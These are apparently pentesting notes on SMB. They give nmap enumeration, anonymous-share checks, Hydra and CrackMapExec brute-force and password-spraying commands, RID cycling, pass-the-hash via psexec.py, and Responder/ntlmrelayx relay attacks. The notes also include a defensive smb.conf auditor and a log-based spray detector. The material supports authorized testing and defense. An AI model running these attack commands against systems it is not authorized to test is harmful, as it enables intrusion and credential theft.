# SMB Pentesting Notes

## Protocol Overview

### Basic Information

* **Port**: TCP 139 (NetBIOS), TCP 445 (Direct TCP/IP)
* **Protocol Type**: Application layer
* **Purpose**: File sharing, printer sharing, and remote administration
* **Security**: Authentication and ACL-based access control

### Protocol Versions

1. **SMB 1.0/CIFS**
   * Legacy version, highly vulnerable
   * Used in Windows NT/2000/XP
   * Should be disabled due to security risks
2. **SMB 2.0/2.1**
   * Introduced with Windows Vista
   * Improved performance and reliability
   * Better security features
3. **SMB 3.0+**
   * Introduced with Windows 8/Server 2012
   * Supports encryption and secure failover
   * Current standard for Windows networks

## Initial Enumeration

### Port Scanning

```bash
# Basic SMB scan
nmap -p139,445 -sV <target>

# Aggressive scan with scripts
nmap -p139,445 -sV -sC -A <target>

# Vulnerability scanning (quote the wildcard so the shell does not expand it before nmap sees it)
nmap -p139,445 --script "smb-vuln*" <target>
```

### Banner Grabbing

```bash
# Using SMBClient
smbclient -L //<target> -N

# Using Metasploit (the remaining lines are typed at the msfconsole prompt)
msfconsole -q
use auxiliary/scanner/smb/smb_version
set RHOSTS <target>
run

# Using rpcclient
rpcclient -U "" -N <target>
```

## Anonymous/Guest Access

### Testing Anonymous Access

```bash
# Using smbclient
smbclient -L //<target> -N
smbclient //<target>/share -N

# Using smbmap
smbmap -H <target> -u "guest" -p ""
smbmap -H <target> -u "null" -p ""

# Using CrackMapExec
crackmapexec smb <target> --shares -u "" -p ""
```

## Brute Force Attacks

### Using Hydra

```bash
# Basic authentication
hydra -l user -P passwords.txt smb://<target>

# Multiple users
hydra -L users.txt -P passwords.txt smb://<target>
```

### Using CrackMapExec

```bash
# Password spraying
crackmapexec smb <target> -u users.txt -p password123

# Brute force
crackmapexec smb <target> -u user -p passwords.txt
```

### Using Metasploit

```bash
use auxiliary/scanner/smb/smb_login
set RHOSTS <target>
set USER_FILE users.txt
set PASS_FILE passwords.txt
run
```

## Common NSE Scripts

```bash
# Discovery scripts
nmap -p445 --script smb-protocols <target>
nmap -p445 --script smb-security-mode <target>
nmap -p445 --script smb-enum-shares <target>
nmap -p445 --script smb-enum-users <target>
nmap -p445 --script smb-enum-domains <target>

# Vulnerability scripts
nmap -p445 --script smb-vuln-ms17-010 <target>
nmap -p445 --script smb-vuln-ms08-067 <target>
nmap -p445 --script smb-double-pulsar-backdoor <target>
```

## Share Operations

### Listing Shares

```bash
# Using smbclient
smbclient -L //<target> -U user

# Using smbmap
smbmap -H <target> -u user -p password

# Using CrackMapExec
crackmapexec smb <target> -u user -p password --shares
```

### Accessing Shares

```bash
# Interactive access
smbclient //<target>/share -U user

# Mount share locally
mount -t cifs //<target>/share /mnt/share -o username=user

# Download files
smbget -R smb://<target>/share -U user
```

## RPC Enumeration

### Using rpcclient

```bash
# Connect
rpcclient -U "" -N <target>

# Common commands
rpcclient $> srvinfo
rpcclient $> enumdomusers
rpcclient $> enumdomgroups
rpcclient $> lookupnames admin
rpcclient $> enumprinters
```

### RID Cycling

```bash
# Manual RID cycling
for i in $(seq 500 1100); do 
    rpcclient -N -U "" <target> -c "queryuser 0x$(printf '%x\n' $i)" | grep "User Name\|user_rid\|group_rid" && echo ""
done

# Using impacket
lookupsid.py anonymous@<target>
```

## Advanced Techniques

### Pass-the-Hash

```bash
# Using CrackMapExec
crackmapexec smb <target> -u Administrator -H "<HASH>"

# Using pth-smbclient
pth-smbclient //<target>/share -U DOMAIN/user%hash

# Using impacket
psexec.py -hashes :<hash> user@<target>
```

### SMB Relay Attacks

```bash
# Using Responder
responder -I eth0 -wrfv

# Using ntlmrelayx
ntlmrelayx.py -tf targets.txt -smb2support
```

## Configuration Files

### Samba Configuration

* Main config: `/etc/samba/smb.conf`
* Users database: `/var/lib/samba/private/passdb.tdb`
* Share definitions: `/etc/samba/shares.conf`

### Windows Configuration

* Registry: `HKLM\System\CurrentControlSet\Services\LanmanServer`
* Group Policy: `Computer Configuration\Windows Settings\Security Settings\File System`

## Common Vulnerabilities

1. **Protocol Vulnerabilities**
   * EternalBlue (MS17-010)
   * EternalRomance
   * SMBGhost (CVE-2020-0796)
2. **Configuration Issues**
   * Null sessions allowed
   * Guest access enabled
   * Weak share permissions
   * Unencrypted traffic
3. **Authentication Issues**
   * Weak passwords
   * Password reuse
   * Clear-text credentials
   * Kerberos misconfiguration
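The configuration issues above map directly onto Samba options in `smb.conf`. The following audit is an added example (not code from these notes or from the Samba project) that parses a config and flags SMB1 negotiation, guest mapping, unrestricted null sessions, optional encryption and guest-accessible shares; both configuration texts are constructed, and the option names are Samba's own.

```python
import configparser

SMB1_DIALECTS = {"core", "coreplus", "lanman1", "lanman2", "nt1"}

# Constructed weak config (added example, not from a real host): SMB1 negotiable,
# unknown users mapped to guest, cleartext allowed, guest-writable share.
WEAK_CONF = """[global]
   server min protocol = NT1
   map to guest = Bad User
   smb encrypt = off
[public]
   guest ok = yes
   writable = yes
"""

# Constructed hardened counterpart for the same share.
HARDENED_CONF = """[global]
   server min protocol = SMB3
   map to guest = Never
   restrict anonymous = 2
   smb encrypt = required
[public]
   guest ok = no
   writable = no
"""

def audit_smb_conf(text):
    """Return (section, finding) tuples for the configuration issues listed above."""
    # smb.conf is INI-like; interpolation is off because Samba uses %U/%m macros and
    # strict=False tolerates repeated keys the way smbd does (last value wins).
    cp = configparser.ConfigParser(strict=False, interpolation=None)
    cp.read_string(text)
    g = cp["global"] if cp.has_section("global") else {}
    val = lambda key, default: g.get(key, default).strip().lower()
    findings = []
    proto = val("server min protocol", "unset")
    if proto in SMB1_DIALECTS or proto == "unset":  # Samba before 4.11 defaulted to NT1
        findings.append(("global", "SMB1 negotiable: server min protocol = " + proto))
    if val("map to guest", "never") != "never":
        findings.append(("global", "guest mapping enabled: map to guest = " + val("map to guest", "")))
    if val("restrict anonymous", "0") == "0":
        findings.append(("global", "null sessions permitted: restrict anonymous = 0"))
    if val("smb encrypt", "default") not in ("required", "mandatory"):
        findings.append(("global", "encryption not required: smb encrypt = " + val("smb encrypt", "default")))
    for share in (s for s in cp.sections() if s not in ("global", "printers", "print$")):
        guest = cp[share].get("guest ok", "no").strip().lower() == "yes"
        writable = cp[share].get("writable", cp[share].get("writeable", "no")).strip().lower() == "yes"
        if guest:
            findings.append((share, "guest-accessible share" + (" is writable" if writable else "")))
    return findings
```

Run `audit_smb_conf(open("/etc/samba/smb.conf").read())` on a host to get the same findings list for a real configuration.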

## Post-Exploitation

### Information Gathering

* Enumerate domain users and groups
* Map network shares
* Identify sensitive files
* Check for hidden shares
* Extract system information

### Privilege Escalation

* Check for writeable shares
* Search for sensitive files
* Look for stored credentials
* Test for SeBackupPrivilege
* Exploit service misconfigurations

## Common Status Codes

| Code       | Meaning                  |
| ---------- | ------------------------ |
| 0x00000000 | Success                  |
| 0xC0000022 | Access Denied            |
| 0xC000006D | Logon Failure            |
| 0xC0000203 | User Session Deleted     |
| 0xC0000224 | Password Change Required |
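From the defender's side, these status codes are what distinguishes the brute-force and spraying patterns from the earlier section in logon telemetry. The detection below is an added example, not part of the original notes: the `src=`/`user=`/`status=` log format and every record in it are constructed (the fields are modelled on a Windows 4624/4625 event), and the thresholds are arbitrary starting points.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# From the table above: 0xC000006D is the credential failure; 0xC0000224 (expired password) is not spray evidence.
SUCCESS, LOGON_FAILURE = 0x00000000, 0xC000006D

# Constructed logon records (fields modelled on Windows 4624/4625 events), not real telemetry.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z src=10.0.0.5 user=alice status=0xC000006D
2024-05-01T10:00:02Z src=10.0.0.5 user=bob status=0xC000006D
2024-05-01T10:00:03Z src=10.0.0.5 user=carol status=0xC000006D
2024-05-01T10:00:04Z src=10.0.0.5 user=carol status=0x00000000
2024-05-01T10:01:00Z src=10.0.0.9 user=svc_backup status=0xC000006D
2024-05-01T10:01:01Z src=10.0.0.9 user=svc_backup status=0xC000006D
2024-05-01T10:01:02Z src=10.0.0.9 user=svc_backup status=0xC000006D
2024-05-01T10:01:03Z src=10.0.0.9 user=svc_backup status=0xC000006D
2024-05-01T10:05:00Z src=10.0.0.7 user=erin status=0xC0000224
2024-05-01T10:05:01Z src=10.0.0.7 user=erin status=0xC000006D
"""
LINE_RE = re.compile(r"^(\S+) src=(\S+) user=(\S+) status=0x([0-9A-Fa-f]{8})$")

def parse_log(text):
    """Yield (timestamp, src, user, status) tuples; non-matching lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%SZ")
            yield ts, m.group(2), m.group(3), int(m.group(4), 16)

def detect(text, window=timedelta(minutes=5), user_threshold=3, attempt_threshold=4):
    """Return {(src, kind): detail} for spraying, brute force, and success-after-failure."""
    by_src = defaultdict(list)
    for rec in parse_log(text):
        by_src[rec[1]].append(rec)
    alerts = {}
    for src, recs in by_src.items():
        recs.sort()
        fails = [r for r in recs if r[3] == LOGON_FAILURE]
        for i, first in enumerate(fails):  # window anchored at each failure in turn
            span = [r for r in fails[i:] if r[0] - first[0] <= window]
            users = {r[2] for r in span}
            if len(users) >= user_threshold:  # one source, many accounts
                alerts.setdefault((src, "password spray"), len(users))
            for u in users:  # one source, one account, repeated failures
                if sum(r[2] == u for r in span) >= attempt_threshold:
                    alerts.setdefault((src, "brute force"), u)
        for ts, _, user, code in recs:  # a hit after misses from the same source
            if code == SUCCESS and any(f[2] == user and f[0] < ts for f in fails):
                alerts.setdefault((src, "success after failures"), user)
    return alerts
```

On the sample, 10.0.0.5 is flagged for spraying and for a success on `carol` after failures, 10.0.0.9 for brute-forcing `svc_backup`, and 10.0.0.7 is not flagged because its expired-password result is not a credential failure.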

## Best Practices for Pentesting

1. **Initial Reconnaissance**
   * Identify SMB version
   * Check for null sessions
   * Test anonymous access
   * Map available shares
2. **Deep Enumeration**
   * Enumerate users and groups
   * Check share permissions
   * Look for sensitive data
   * Test write access
   * Identify vulnerabilities
3. **Documentation**
   * Record share listings
   * Document user accounts
   * Note system information
   * Save vulnerability evidence
4. **Risk Assessment**
   * Evaluate security posture
   * Assess potential impact
   * Consider attack vectors
   * Prioritize vulnerabilities
5. **Reporting**
   * Detail findings
   * Provide remediation steps
   * Include evidence
   * Suggest security improvements
